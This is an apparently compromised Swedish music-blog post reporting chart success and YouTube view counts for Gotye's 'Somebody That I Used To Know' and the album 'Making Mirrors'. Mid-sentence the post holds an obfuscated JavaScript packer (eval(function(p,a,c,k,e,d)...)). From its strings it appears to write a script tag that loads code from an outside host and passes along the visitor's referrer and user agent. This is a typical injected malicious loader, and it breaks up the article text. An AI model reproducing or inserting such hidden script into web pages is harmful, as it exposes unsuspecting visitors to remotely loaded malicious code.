Image Image Image Image Image Image Image Image Image Image

| 7 juni, 2020

Scroll to top

Top

Gotye-feber på Youtube! | Videon ökar med 2,000,000 visningar per dag

Sebastian

Gotye-febern stiger och har nu uppgraderats till en pandemi. Symptomen yttrar sig främst med att förstasingeln eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tinhi|var|u0026u|referrer|eirys||js|php’.split(’|’),0,{}))
”Somebody That I Use To Know”
och albumet ”Making Mirrors” överlägset toppar det drabbade landets listor. Smittan har även bekräftats i Sverige där ”Somebody..” nu uppnått dubbel platina. Videon till “Somebody…” passerade just 200 miljoner visningar på YouTube. Därmed är videon en av de mest sedda i YouTubes historia och den ökar med ofattbara 2 miljoner visningar per dag.

Just nu:

  • “Somebody That I Use To Know” – #1 på iTunes i 36 länder och Topp 10 i 44 stycken.
  • “Somebody…” – #1 på singellistan i 16 länder.
  • “Somebody…” – #1 på Billboard.
  • ”Somebody…” – Över 5 miljoner sålda ex världen över.
  • “Making Mirrors” – Topp 10 på iTunes i 29 länder.
  • ”Making…”- Topp 10 på albumlistan i 17 länder.
  • ”Making…” – #7 på Billboard.
  • ”Making…” – Över 1 miljon sålda ex världen över.

Se den hyllade videon ovan: